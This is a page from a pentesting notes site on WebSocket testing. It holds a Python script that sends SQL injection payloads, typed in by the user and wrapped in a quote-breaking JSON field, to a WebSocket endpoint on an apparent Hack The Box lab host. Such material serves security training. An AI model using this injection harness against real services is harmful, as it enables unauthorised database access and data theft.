PwnSec Notes
  • AppSec
    • General Notes
    • Payloads
    • Fuzzing
    • Code Review
    • ReDos
    • SSTI
    • LFI-RFI
    • PHP Tricks
    • Javascript
    • Serialization
    • SQL Injection
    • JWT
    • GraphQL
    • Side Channel
    • Command Execution
    • WebSockets
    • Ruby
    • 0Auth
    • Latex Injection
    • NoSQL
    • JS Analysis
    • Apache Lucene
  • Forensics
    • Basics
    • Network Captures
    • Windows Logs
    • Memory
    • Browser
    • Threat Intelligence
    • Disk
  • Binary-Exploitation
    • Concepts
    • Binary Analysis
    • Debugging
    • Shellcodes
  • Malware-Analysis
    • Memory Mapping
    • Macros
    • Unpacking
    • Analysis
    • Resources
  • Reverse-Engineering
    • GDB basics
    • MASM Basics
    • Decompilers
    • Useful Codes
  • Services
    • SNMP
    • Grafana
    • Consul
  • Network Pentesting
    • C2 Servers
    • Pivoting
    • CrackMapExec
    • Kubernetes
    • Docker
  • MISC
    • Slack
    • Git
    • Pyjails
    • Privilege Escalation
    • Python LOL Code
  • Cloud Hacking
    • AWS S3
    • AWS Cognito
  • Mobile Pentesting
    • Frida
    • ADB
    • Drozer
    • Smali
    • Static Analysis
    • Dynamic Analysis
    • Bypass SSL Pinning
    • APK Labs
    • Android Malwares
    • Abusing Firebase
    • Root Detection
Powered by GitBook
On this page
  1. AppSec

WebSockets

Manual SQLI Testing

import websocket
import readline
from rich.console import Console

readline.read_history_file("sqli.history")
readline.parse_and_bind("tab: complete")
r = Console()

r.print("[+] zSockets...\n",style="bold green")
#websocket.enableTrace(True)
ws = websocket.WebSocket()
parameter = '{"version": "0\\\" PAYLOAD ;--"}'
try:
    while True:
        readline.append_history_file(100,"sqli.history")
        ws.connect("ws://ws.qreader.htb:5789/version")
        injection = input("(SQLI)>> ")
        x = parameter.replace("PAYLOAD",injection)
        ws.send(x)
        r.print(ws.recv(), style="bold blue")
        ws.close()
except (KeyboardInterrupt, EOFError):
    exit(0)
PreviousCommand ExecutionNextRuby

Last updated 2 years ago